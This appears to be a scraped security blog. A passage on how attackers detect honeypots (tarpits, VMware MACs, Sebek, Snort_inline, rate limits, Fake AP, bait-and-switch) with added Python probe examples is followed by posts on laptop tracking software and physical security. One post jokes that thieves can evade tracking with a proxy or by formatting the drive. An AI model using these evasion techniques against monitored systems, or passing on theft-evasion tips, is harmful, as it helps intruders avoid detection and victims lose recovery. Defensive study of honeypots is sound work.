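HDR_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<flags>[A-Z.]+) ")
WIN_RE = re.compile(r"\bwin (\d+)")

TINY_SYNACK_WINDOW = 16   # assumption: a tarpit advertises a window of a few bytes

# The Labrea exchange shown in the post.
TARPIT_CAPTURE = """\
03:26:01.435072 10.0.0.2.1330 > 10.0.0.1.80: S [tcp sum ok] 911245487:911245487(0) win 64240 (DF) (ttl 64, id 6969, len 48)
03:26:01.435635 10.0.0.1.80 > 10.0.0.2.1330: S [tcp sum ok] 3255338435:3255338435(0) ack 911245488 win 3 (ttl 255, id 48138, len 40)
03:26:01.435719 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:1(0) ack 1 win 64320 (DF) (ttl 128, id 4970, len 40)
03:26:01.435887 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:4(3) ack 1 win 64320 (DF) (ttl 128, id 4971, len 43)
03:26:01.436224 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 44321, len 40)
03:26:03.731433 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 4:5(1) ack 1 win 64320 (DF) (ttl 128, id 4973, len 41)
03:26:03.731673 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 35598, len 40)
"""

# Constructed contrast: an ordinary web server acknowledging with a normal window.
NORMAL_CAPTURE = """\
03:30:00.000100 10.0.0.2.1400 > 10.0.0.9.80: S [tcp sum ok] 100:100(0) win 64240 (DF) (ttl 64, id 1, len 48)
03:30:00.000200 10.0.0.9.80 > 10.0.0.2.1400: S [tcp sum ok] 500:500(0) ack 101 win 5840 (ttl 64, id 2, len 44)
03:30:00.000300 10.0.0.2.1400 > 10.0.0.9.80: . [tcp sum ok] 1:1(0) ack 1 win 64240 (DF) (ttl 64, id 3, len 40)
03:30:00.000400 10.0.0.2.1400 > 10.0.0.9.80: P [tcp sum ok] 1:4(3) ack 1 win 64240 (DF) (ttl 64, id 4, len 43)
03:30:00.000500 10.0.0.9.80 > 10.0.0.2.1400: . [tcp sum ok] 1:1(0) ack 4 win 5840 (ttl 64, id 5, len 40)
"""


def parse_packet(line):
    """Extract endpoints, SYN/ACK flags and the advertised window from one tcpdump line."""
    m = HDR_RE.match(line)
    if not m:
        return None
    w = WIN_RE.search(line)
    return {
        "src": f"{m['src']}:{m['sport']}",
        "dst": f"{m['dst']}:{m['dport']}",
        "syn": "S" in m["flags"],
        "ack": " ack " in line,
        "win": int(w.group(1)) if w else None,
    }


def find_tarpits(capture):
    """Per server endpoint (the side that received a SYN): SYN/ACK window,
    number of zero-window acknowledgements, and the tarpit verdict."""
    servers = {}
    for line in capture.splitlines():
        p = parse_packet(line)
        if p is None:
            continue
        if p["syn"] and not p["ack"]:          # client opening a flow: remember the server side
            servers.setdefault(p["dst"], {"synack_win": None, "zero_window_acks": 0, "likely_tarpit": False})
            continue
        st = servers.get(p["src"])
        if st is None:                         # packet from the client side; not of interest here
            continue
        if p["syn"] and p["ack"]:
            st["synack_win"] = p["win"]
        elif p["ack"] and p["win"] == 0:
            st["zero_window_acks"] += 1
        st["likely_tarpit"] = (st["synack_win"] is not None
                               and st["synack_win"] <= TINY_SYNACK_WINDOW
                               and st["zero_window_acks"] >= 1)
    return servers


if __name__ == "__main__":
    for name, cap in (("labrea", TARPIT_CAPTURE), ("normal", NORMAL_CAPTURE)):
        print(name, find_tarpits(cap))
```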

2. About layer 2 :

If an attack is launched from the same LAN segment as a honeypot, there might be issues seen at layer 2. This might be important if you want to handle the inherent risks with an intruder who would otherwise succeed in gaining access deeper and deeper into your network infrastructure. It might also be important with a honeypot used to catch malicious internal users.
Labrea also has the capability of answering requests sent to computers that do not exist. By looking at unanswered ARP requests, Labrea can be configured to simulate unused IP addresses, which is a very interesting way to fight worms on large networks with thousands of such addresses. If an attacker is on the same network segment as Labrea, there is a way to do fingerprinting at layer 2: this daemon always answers with the same unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole, and thus there is an obvious way to detect it. By looking at such ARP responses, the attacker might have such a concern:

04:59:00.889458 arp reply 10.0.0.1 (0:0:f:ff:ff:ff) is-at 0:0:f:ff:ff:ff

If you want to explore this as an exercise, you can find and change this hard coded value in the sources of Labrea (PacketHandler.c):

u_char bogusMAC[6] = {0,0,15,255,255,255};

VMware is well-known commercial software for virtual machines that allows you to launch multiple instances of different operating systems on a single piece of hardware. These operating systems are isolated in secure virtual machines, and the VMware virtualization layer maps the physical hardware resources to the virtual machine's resources, so each virtual machine has its own CPU, memory, disks, I/O devices, etc. It only emulates x86 hardware at the moment, and it is widely used by honeypot operators because it allows, among other things, easy deployment of honeypots. Sometimes you can guess that a system is running on top of VMware by looking at the MAC addresses. It does not mean that this is a honeypot, but it might give pause and some doubts to an aggressor. If you look at the IEEE standards, you will find this current range of MAC addresses assigned to VMware, Inc:

00-05-69-xx-xx-xx
00-0C-29-xx-xx-xx
00-50-56-xx-xx-xx

So if an aggressor sees such a MAC address, either among the cached MAC addresses (via arp -a) or in the data related to the interface (Unix: ifconfig or Windows: ipconfig /all), he/she might find something interesting.

Some attackers try to reach remote NetBIOS services in order to launch Windows-specific attacks. Honeypot builders dream of catching 0-day exploits against a patched system, but using the Windows integrated firewall might stop most attackers. That's why they often open the related Windows ports (NetBIOS ports, including 135, 137-139 and 445 TCP/UDP), waiting for an intruder. But what if an attacker interacts with the NetBIOS service? He/she will be able to get the MAC address and guess that a system is in fact a VMware guest (Unix: nmblookup or Windows: nbtstat -A @IP). Some could argue that it is possible to change the MAC address in the VMware configuration, but still only some addresses might be accepted: VMware's MAC addresses begin with 00:50:56 (e.g. ethernet0.address = 00:50:56:XX:YY:ZZ).

There are also other points of interest for attackers who would like to fingerprint VMware by means of MAC addresses. For example, when the VMware ESX server automatically generates MAC addresses like 00:05:69:XX:YY:ZZ, it usually means that the IP address of this server is A.B.C.D, where XX is the hexadecimal of C and YY is the hexadecimal of D. This might reveal the use of NAT in front of the VMware box (different external address).

Honeyd is a powerful open source honeypot daemon written by Niels Provos. In the past, most people have used Honeyd with another tool, arpd, which answered ARP requests in order to redirect the needed traffic to Honeyd. Some people thought that this could create a stealth problem, because there would be multiple IP addresses with the same MAC address (but this can also happen on a layer 2 bridge). If you use a recent version, Honeyd allows you to specify a MAC address for each virtual computer without being limited to just one. Simply add this line to a created template, choosing the MAC address for your simulated system:

set template ethernet ""

This might be better than using the arpd daemon and gives a great opportunity for stealth at layer 2. Maximillian Dornseif has also outlined some possibilities for using Honeyd without arpd.

User-Mode Linux (UML), free software under the GPL, is another tool for creating virtual machines. It virtualises Linux itself, so that you can run an entire Linux environment in user space, and it allows you to run multiple instances of Linux at the same time on a single piece of hardware. Dedicated to Linux, it looks similar to the commercial solution VMware, which is why so many people use it to build honeypots. From a layer 2 point of view, there is a useful option to fix the MAC address of a UML guest by appending parameters when launching it:

eth0=tuntap,,xx:xx:xx:xx:xx:xx,@IP (where xx:xx:xx:xx:xx:xx is the MAC address and @IP is the IP address).

3. Sebek-based Honeypots :

Sebek is a client/server application, and it is the primary data capture tool used by honeynet researchers to capture the activities of an attacker found inside a honeypot. It is a kernel-based rootkit that hijacks the read() system call and is therefore able to record all data accessed via read(). Sebek lives entirely in kernel space and has access to all data read, so it is able to access most communication unencrypted. It can, for example, log SSH sessions, recover files copied with SCP and record all passwords used by intruders. The recorded data is sent in a covert manner via UDP to the Sebek server, the other part of Sebek's client/server architecture. This transmission is done by modifying the kernel in order to hide these outgoing packets so that an intruder cannot see them. In addition, all network counters and data structures have to be adapted in order to make detecting these changes more difficult. Further information about Sebek and its architecture can be found on the Honeynet site.
It is possible to detect the presence of Sebek by using the network layer, however. Because Sebek records everything accessed via read() and then sends this data over the network, some congestion effects will be visible if we read lots of data on the system. When we read a single byte via a read(1) call, Sebek has to transfer nearly 100 bytes of data, including all the network headers, over the network to the host doing the logging. So if we are able to do a read(1) some tens of thousands of times per second, this will lead to a congested network and finally to dropped packets.
We are able to generate many read(1) calls with the help of the dd command:

dd if=/dev/zero of=/dev/null bs=1

And we are able to identify a congested network with the help of the ping command, as outlined below.

We first ping a local IP address (for example, the gateway) in order to get an overview of the current congestion of the network. Then dd is started in the background and we run the ping command again. If Sebek is installed on the host, this leads to a significant increase in the average round-trip time. In practical tests, the average round-trip time grew from 0.7 milliseconds to over 4800 milliseconds.
There are also further methods to detect and circumvent the presence of Sebek if we use layers other than the network layer.

4. Snort_inline :

Snort_inline is an inline packet modification engine, and it provides for packet rewriting of what looks like something dangerous into something harmless. It is basically a modified version of the popular Intrusion Detection System (IDS) Snort and adds several new rule types (drop, sdrop and reject) to tell iptables whether a packet should be dropped, rejected, modified, or allowed to pass based on a Snort rule set.
An example of this technique is replacing the string /bin/sh in shellcode with /ben/sh, so that the exploit never gets its shell. Another example is rewriting characteristic byte patterns in network traffic so that the attack stops working, as in the following rule, which modifies x86 shellcode (the replacement must be exactly as long as the matched content, because the packet is rewritten in place):

alert ip $HONEYNET any -> $EXTERNAL_NET any (msg:"SHELLCODE x86 stealth NOOP"; sid:651; content:"|EB 02 EB 02 EB 02|"; replace:"|24 00 99 DE 6C 3E|";)

This kind of Intrusion Prevention System (IPS) is used in GenII (2nd generation) Honeynets to identify and block known attacks. Snort_inline is also necessary because it limits the attacker's ability to bounce from a compromised honeypot to attack further systems, which also gives the operator some safety from a legal point of view.
But dropping or modifying outgoing packets gives an attacker an easy way to spot Snort_inline. If outgoing packets are dropped, the honeynet looks suspicious, like a kind of black hole. If outgoing packets are modified, a sophisticated attacker will notice: he/she sends packets with malicious content to another host under his/her control and checks whether they arrive unaltered (apart from small expected changes such as a decremented Time To Live). If the payload differs, he/she will probably conclude that something is fishy. The stealthiness of Snort_inline can be increased by using fewer rules, but then more attacks go unnoticed. A trade-off between stealthiness and safety has to be found.
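To make both sides of this concrete, here is an added example (not code from the article or from Snort_inline itself) that parses Snort's content/replace syntax, applies the rewrite the way the IPS would, and then performs the attacker's check: compare the probe payload that was sent with the copy that arrived at a controlled host, ignoring header fields such as TTL. The /bin/sh rule and the probe payload are constructed for the example; the stealth-NOOP rule is the one quoted above.

```python
"""Added example: Snort_inline 'replace' mechanics and the attacker-side canary check."""
import re


def parse_snort_bytes(spec: str) -> bytes:
    """Snort content syntax: text outside |...| is literal, text inside |...|
    is space-separated hex, e.g. "|EB 02 EB 02|" or "/bin/sh"."""
    out = bytearray()
    for i, chunk in enumerate(spec.split("|")):
        out += bytes.fromhex(chunk) if i % 2 else chunk.encode("latin-1")
    return bytes(out)


def rule_replacement(rule: str) -> tuple:
    """Extract (content, replace) from a rule. Snort requires equal lengths
    because the packet is rewritten in place and its length must not change."""
    content = parse_snort_bytes(re.search(r'content:"([^"]*)"', rule).group(1))
    replace = parse_snort_bytes(re.search(r'replace:"([^"]*)"', rule).group(1))
    if len(content) != len(replace):
        raise ValueError("replace must be the same length as content")
    return content, replace


def apply_replace(payload: bytes, rule: str) -> bytes:
    """What the IPS does to the payload of a matching packet."""
    content, replace = rule_replacement(rule)
    return payload.replace(content, replace)


def changed_offsets(sent: bytes, received: bytes) -> list:
    """Attacker side: byte offsets at which the received copy differs from what
    was sent. Only the payload is compared; IP header fields such as TTL are
    expected to change in transit and are deliberately not part of the check."""
    diffs = [i for i, (a, b) in enumerate(zip(sent, received)) if a != b]
    diffs += list(range(min(len(sent), len(received)), max(len(sent), len(received))))
    return diffs


# The rule quoted in the article, and the /bin/sh -> /ben/sh trick written as a rule.
STEALTH_NOOP_RULE = ('alert ip $HONEYNET any -> $EXTERNAL_NET any '
                     '(msg:"SHELLCODE x86 stealth NOOP"; sid:651; '
                     'content:"|EB 02 EB 02 EB 02|"; replace:"|24 00 99 DE 6C 3E|";)')
BIN_SH_RULE = ('alert ip $HONEYNET any -> $EXTERNAL_NET any '
               '(msg:"bin sh"; content:"/bin/sh"; replace:"/ben/sh";)')

# Constructed probe: a stealth-NOOP sled, a few real NOPs and a /bin/sh string.
PROBE = b"\xeb\x02\xeb\x02\xeb\x02" + b"\x90" * 4 + b"/bin/sh\x00"


def probe_through_ips(payload: bytes = PROBE, rules=(STEALTH_NOOP_RULE, BIN_SH_RULE)) -> dict:
    """Simulate sending the probe through the honeynet to a host we control."""
    received = payload
    for rule in rules:
        received = apply_replace(received, rule)
    changed = changed_offsets(payload, received)
    return {"received": received, "changed": changed, "ips_detected": bool(changed)}


if __name__ == "__main__":
    r = probe_through_ips()
    print("altered offsets:", r["changed"], "-> IPS present" if r["ips_detected"] else "-> clean")
```

In a real test the probe is carried in a normal connection to the attacker's own host and the comparison is done on the capture there; any altered payload byte is the tell, regardless of which rule fired.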
Moreover, GenII Linux Honeynets typically use the netfilter/iptables functionality of the kernel to implement connection limiting. This prevents a compromised honeypot from being abused for denial-of-service attacks or mass scanning, while still allowing an attacker to download toolkits or set up automated bots. As an example, the default configuration of the rc.firewall script provided by the Honeynet Project allows 15 outgoing TCP connections and 50 outgoing ICMP packets per day:

[...]
### Set the connection outbound limits for different protocols.
SCALE="day"
TCPRATE="15"
UDPRATE="20"
ICMPRATE="50"
OTHERRATE="15"
[...]

This connection limiting also creates a problem for the secrecy of a honeypot: an aggressor can simply try to open many outgoing connections to different hosts, or send a lot of ICMP echo requests to varying hosts. If he/she notices that after some time no more outgoing packets reach their targets, that is a clear sign that something weird is going on and that he/she has probably landed in a honeypot. Again, a trade-off between stealthiness and safety has to be found: if you allow more outgoing packets, detection becomes harder, but the attacker has more ways to abuse the honeypot.
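The attacker's probe for that limit, as an added example (not code from the article or from rc.firewall): connect to a series of distinct hosts and count how many succeed before outgoing connections start failing in a row. The connect function is injectable so that the logic can be exercised against a stand-in for the netfilter limit; the target list and the three-failure cut-off are constructed assumptions for the example.

```python
"""Added example: probing a honeypot's outbound connection limit."""
import socket


def tcp_connect(target: tuple, timeout: float = 3.0) -> bool:
    """Real connection attempt; True if the TCP handshake completed."""
    try:
        with socket.create_connection(target, timeout=timeout):
            return True
    except OSError:
        return False


def probe_outbound_limit(targets, connect=tcp_connect, consecutive_failures=3) -> dict:
    """Connect to distinct hosts in turn and report how many succeeded before
    the first run of consecutive failures. Behind rc.firewall's default
    TCPRATE="15" roughly the first 15 go through and the rest are silently
    dropped, which a normal host would not do for reachable targets."""
    succeeded, failures = 0, 0
    for target in targets:
        if connect(target):
            succeeded += 1
            failures = 0
        else:
            failures += 1
            if failures >= consecutive_failures:
                break
    cut_off = failures >= consecutive_failures
    return {"succeeded": succeeded, "cut_off": cut_off,
            "looks_rate_limited": cut_off and succeeded > 0}


def simulated_honeypot_firewall(limit: int):
    """Stand-in for the netfilter rule: allows `limit` new connections per
    period (SCALE="day" in rc.firewall), then drops everything."""
    state = {"used": 0}

    def connect(_target):
        if state["used"] < limit:
            state["used"] += 1
            return True
        return False
    return connect


if __name__ == "__main__":
    # Constructed target list; in a real probe these are hosts known to be reachable.
    targets = [(f"10.0.0.{i}", 80) for i in range(1, 31)]
    print(probe_outbound_limit(targets, connect=simulated_honeypot_firewall(15)))
```

Using distinct destinations matters: the rc.firewall counters are per protocol, so a burst of connections to one host and a burst to thirty hosts hit the same limit, but only the latter rules out a per-destination block on the attacker's own target.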

5. Fake AP (Access Point) :

Fake AP is a Perl script that generates bogus 802.11b beacon frames with random ESSID and BSSID (MAC address) assignments. It sends these frames on random channels and can also simulate the Wired Equivalent Privacy (WEP) protocol. A real access point will "hide in sight amongst Fake AP's cacophony of beacon frames", so the tool can also serve as a wireless honeypot: deploy one Linux machine running Fake AP near your wireless network and watch for suspicious traffic. Legitimate users know the SSID of the network and connect without problems; malicious users will try to connect with different SSIDs and can thus be spotted easily.
In its current version, Fake AP generates no traffic for any of its simulated access points, and that gives an easy way to detect it: the tool only sends beacon frames, never any real data. An attacker who monitors the wireless traffic for a while will see dozens of access points that beacon but never exchange a single data frame, and can easily conclude that Fake AP is in use.
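That detection, as an added example that is not part of the original article or of Fake AP: the capture is reduced to (BSSID, SSID, frame kind) records and every BSSID that only ever beacons is flagged. The frame records below are constructed; a real run would build them from a monitor-mode capture (for example airodump-ng output or a scapy sniff), and the threshold of three silent APs is an assumption for the example.

```python
"""Added example: spot Fake AP by access points that beacon but carry no traffic."""

# Constructed sample: one real AP with a client exchanging data, three Fake AP
# "access points" (random BSSIDs and SSIDs) that only ever send beacons.
SAMPLE_FRAMES = [
    ("00:11:22:33:44:55", "corp-wifi", "beacon"),
    ("00:11:22:33:44:55", "corp-wifi", "probe_resp"),
    ("00:11:22:33:44:55", "corp-wifi", "data"),
    ("00:11:22:33:44:55", "corp-wifi", "data"),
    ("0a:1b:2c:3d:4e:5f", "linksys", "beacon"),
    ("0a:1b:2c:3d:4e:5f", "linksys", "beacon"),
    ("d6:e7:f8:09:1a:2b", "default", "beacon"),
    ("5c:6d:7e:8f:90:a1", "NETGEAR", "beacon"),
]


def classify_bssids(frames) -> dict:
    """Return {bssid: {"ssid", "beacons", "other", "beacon_only"}}. A BSSID
    that beacons but never sends data, probe responses or any other frame is
    either an idle AP or one of Fake AP's phantoms."""
    stats = {}
    for bssid, ssid, kind in frames:
        s = stats.setdefault(bssid, {"ssid": ssid, "beacons": 0, "other": 0})
        if kind == "beacon":
            s["beacons"] += 1
        else:
            s["other"] += 1
    for s in stats.values():
        s["beacon_only"] = s["beacons"] > 0 and s["other"] == 0
    return stats


def beacon_only_bssids(frames) -> list:
    return sorted(b for b, s in classify_bssids(frames).items() if s["beacon_only"])


def fake_ap_suspected(frames, min_silent_aps: int = 3) -> bool:
    """One or two silent APs may just be idle; many silent APs with assorted
    SSIDs is the signature of Fake AP. The threshold is an assumption."""
    return len(beacon_only_bssids(frames)) >= min_silent_aps


if __name__ == "__main__":
    for bssid, s in classify_bssids(SAMPLE_FRAMES).items():
        print(bssid, s["ssid"], "beacons only" if s["beacon_only"] else "has traffic")
    print("Fake AP suspected:", fake_ap_suspected(SAMPLE_FRAMES))
```

Because Fake AP also randomises the BSSID, the count of distinct silent BSSIDs keeps growing with capture time, which is itself a stronger signal than any single AP being quiet.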

6. Bait and Switch Honeypots :
Traditionally, information security follows the classical paradigm of "Protect, Detect and React": protect the network as well as possible (for example with firewalls), detect any failures in the defense (with intrusion detection systems), and then react to those failures (perhaps by alerting the admin via mail). The problem with this approach is that the attacker has the initiative and is always one step ahead. The Bait and Switch Honeypot is an attempt to turn honeypots into active participants in system defense and to react faster to threats. To achieve this, the Bait and Switch Honeypot redirects all malicious network traffic to a honeypot once a hostile intrusion attempt has been observed. The honeypot partially mirrors the production system, so the attacker is unknowingly attacking a trap instead of real data. Legitimate users can still access all data and work on the real systems, while the attacker is lured away from everything interesting. As an additional benefit, the aggressor's actions can be observed and his/her tools, tactics and motives studied. A Bait and Switch Honeypot is based on Snort, iproute2, netfilter/iptables and some custom code.
An attacker might detect a Bait and Switch Honeypot by looking at specific TCP/IP values such as the Round-Trip Time (RTT), the Time To Live (TTL), the TCP timestamp and others. After a switch event the attacker stops talking to the real computer and starts interacting with the honeypot. During the switch from the real system to the honeypot a sudden change in the IP ID can be observed, and the other TCP/IP values mentioned will probably change as well, which a sophisticated attacker can notice.
Once again, tcpdump is a valuable tool for attackers to gather information about what is going on. Furthermore, the honeypot will probably differ noticeably from the real system, and the attacker will presumably try to identify it by looking for such differences. Note that some attackers use multiple source IP addresses for their attacks precisely to defeat this kind of IPS: for example, if the attacker's shellcode is a reverse shell that connects back to an IP address different from the one that sent the exploit, the IPS cannot redirect that connection. The details differ with every deployment of a Bait and Switch Honeypot, so the operator of this kind of honeypot has to take great care during setup.
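The passive check described above, as an added example that is not code from the article or from the Bait and Switch project: replies from one server IP are reduced to (sequence, TTL, IP ID, TCP timestamp) records, such as could be read off tcpdump -v output, and each reply is compared with the previous one for changes a single host would not produce. The records are constructed; the IP ID step limit is an assumption for the example.

```python
"""Added example: spot a bait-and-switch by discontinuities in TTL, IP ID and TCP timestamp."""

# Constructed replies from the "same" server IP: packets 0-3 come from the real
# host, packets 4-7 from the honeypot after the switch. Fields are
# (sequence, ttl, ip_id, tcp_tsval).
SAMPLE_REPLIES = [
    (0, 64, 41001, 1_000_000),
    (1, 64, 41002, 1_000_010),
    (2, 64, 41003, 1_000_020),
    (3, 64, 41004, 1_000_030),
    (4, 63, 7, 55_000),
    (5, 63, 8, 55_010),
    (6, 63, 9, 55_020),
    (7, 63, 10, 55_030),
]


def switch_indicators(replies, max_ipid_step: int = 1000) -> list:
    """Return [(index, reasons)] for every reply that breaks continuity with
    the previous one. One host keeps a stable TTL (no route change), an IP ID
    that advances slowly and a TCP timestamp clock that never runs backwards;
    a different box answering mid-connection breaks at least one of these.
    Hosts that randomise IP ID per packet will trip the ip_id check, so TTL
    and timestamp are the more reliable signals there."""
    findings = []
    for i in range(1, len(replies)):
        _, p_ttl, p_id, p_ts = replies[i - 1]
        _, ttl, ip_id, ts = replies[i]
        reasons = []
        if ttl != p_ttl:
            reasons.append("ttl")
        if (ip_id - p_id) % 65536 > max_ipid_step:  # forward distance, wraps at 16 bits
            reasons.append("ip_id")
        if ts < p_ts:
            reasons.append("tcp_timestamp")
        if reasons:
            findings.append((i, reasons))
    return findings


def switch_detected(replies):
    """Index of the first reply at which two independent fields change at
    once, or None. Requiring two fields avoids calling a plain route change
    (TTL only) a switch."""
    return next((i for i, r in switch_indicators(replies) if len(r) >= 2), None)


if __name__ == "__main__":
    for idx, reasons in switch_indicators(SAMPLE_REPLIES):
        print(f"reply {idx}: {', '.join(reasons)} changed")
    print("switch detected at reply:", switch_detected(SAMPLE_REPLIES))
```

Correlating the index of the switch with the attacker's own log of what was sent just before it tells the attacker which action triggered the Snort signature, which is exactly the information the honeypot operator would rather keep hidden.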

There are also commercial tools for detecting honeypots, such as Honeypot Hunter. For more about Honeypot Hunter go here:
www.send-safe.com/honeypot-hunter.html

Tuesday, August 17, 2010

Tracking stolen Laptops and PC

If your machine gets stolen or misplaced you can still track it. There is tracking software that can locate your machine (laptop, PC, notebook etc.).

How does this tracking software work?
The software is installed on the machine. It is invisible and stealthy, like a keylogger or rootkit. If an attacker steals your machine you just inform the company whose product you installed, and the tracking company does the rest.
Whenever the attacker connects your machine to the internet by any means, the tracking software sends information such as the IP address to a central server run by the company whose product you installed. Once the company has the attacker's IP address it can trace the geographical location. If the attacker connects via dial-up, the telephone number is sent to the server as well.
After the machine is confirmed stolen, some tracking software can even encrypt all the data on the HDD and stop the laptop from communicating over the internet at all.

But here is the drawback of tracking software:
The main strength of this software is its weakness too.
If the attacker hides his/her real IP address by using a proxy or any other means, your machine can't be traced. The software also relies on staying installed: it is gone once the HDD is wiped or replaced.
So, next time you steal a laptop or PC, better use a proxy to connect to the internet or format the HDD, else you can end up in jail. ;-) lol


Here is a list of some tracking software:

Ztrace Gold
www.ztrace.com

CyberAngel
www.sentryinc.com

Computrace Plus
www.computrace.com

XTool Computer Tracker
www.computersecurity.com


Hope you find this information useful.

Physical Security

First of all I would like to say that hacking is not only about sitting in front of a computer in a dark room; sometimes you need to perform physical actions too. So I recommend you work out daily and stay healthy. If you can't defend others, you must at least have the strength to defend yourself from danger.

Let us discuss physical security today. I am not going to teach you martial arts or stealth tips on how to kill someone instantly.
This topic is mainly aimed at businesses, but it can also help home users. It is not very technical in nature.



What is physical security ?
Physical security means securing the workplace against an intruder's physical access. In other words, it is the same as securing our home from thieves or burglars (the attackers).

So why do we need physical security?
Because implementing technical security on your machine alone doesn't make it completely safe.
What is the use of locking something precious in a safe if the safe itself can be stolen?
For instance: suppose you have a laptop secured with a good password. If it gets stolen, all your data can be stolen too, because the attacker can now run a password-cracking utility against it at leisure, so your password was useless. Maybe you encrypted your data, but what if the attacker didn't want your data? He/she will open the laptop, unscrew the HDD and fit a new one, or simply format yours. Whatever the attacker does, the loss is yours. So along with technical security we also need to know about physical security.

Physical security checklist :

1. Infrastructure surroundings :
The surroundings of your building must be properly secured with fences, gates, guards, dogs, alarms, metal detectors etc. This is just common sense. It keeps an attacker from damaging your property and also from performing attacks like dumpster diving.

2. Premises/Interior :
Check roof/ceiling access through AC ducts. These ducts lead to many rooms of a building, so their covers must be fixed properly with screws, nuts, bolts etc.
CCTV cameras should be used to monitor activity. The recordings can later be used to investigate an attack. Nowadays these cameras are so small that they can be hidden anywhere without anyone knowing they exist.
Panic buttons must be installed so that any employee who suspects danger can press one to call security. For example, in banks the manager has such a button; whenever there is danger he/she presses it and security is alerted to the attack.
Doors are the main gatekeepers, and there are many types of locks used to keep them secure.
Locks can be electric, magnetic or mechanical, and may be opened with an ID card, a metal key, some sort of code, or biometric authentication. Doors that use metal keys can be defeated by lock picking, so it is better to use electric doors that authenticate via ID card, code or biometrics. Some doors have a keypad on which the user enters a code. Biometric authentication includes fingerprint, retina scan, iris scan, voice authentication etc.

Mantraps :
Mantraps are mainly used in areas that require very strong security, like government and military sites.
This is a good trick to trap an attacker. A room is secured by two doors, so a person has to pass through two doors to get in, with a fair amount of space between them. Moreover both doors can't be open at the same time: one door only opens when the other is closed.
The first door needs no authentication from the outside, so anyone can enter, but the second door requires authentication to open into the room. The first door does require authentication to be opened from the inside.
So here is how the trick works. Suppose an attacker sneaks into a company and reaches the mantrap without knowing what it is. He/she opens the first door and enters, since that requires no authentication, and the first door closes behind him/her. When he/she tries to open the second door it asks for authentication, which he/she doesn't have, so the second door stays shut. The first door also requires authentication to open from the inside.
Having no credentials, the attacker is trapped between the two doors, where he/she can later be caught by security staff and questioned.

3. Reception :
This is usually the place where people sit and wait for someone. It must be secured so that no attacker can get into internal areas. The activity of people in the reception area must be watched and recorded by CCTV, and people sitting there must be asked the reason for their presence. The receptionist's computer must be well secured and its screen must not face the crowd.
Moreover no important documents must be left lying in the reception area; an attacker can use them for social engineering.
Visitors must be seated at a safe distance so that they cannot overhear important conversations.

4. Workplace :
This is the area where the employees work. Employees of one department must not be allowed to pass information to another department unless it concerns their project/work. Employees must lock their screens before leaving them unattended.
This is the main step because it stops an attacker from getting physical access to a logged-in system. Employees must be issued badges so they can be identified; anyone wandering around the company without a badge can be questioned, and visitors must be given visitor badges. Employees must not write useful information on bits of paper and stick them on the desktop, keyboard or walls. It is often seen that employees write their password on a scrap of paper and hide it somewhere like under the keyboard. This must be avoided. It is also common for companies to label their machines with names according to their function, for example a mail server carrying a paper label saying "mail server". This must be avoided because it tells an attacker exactly where your important machines are.
Wireless access points must also be secured to avoid unauthorized access to the corporate network. Use WPA instead of WEP, and add techniques like MAC filtering; all this makes breaking into the WiFi more complicated for the attacker, although MAC filtering alone is weak protection, since an attacker who sniffs the network can copy an allowed client's MAC address.

So these were some precautions that can be taken to implement physical security in an infrastructure.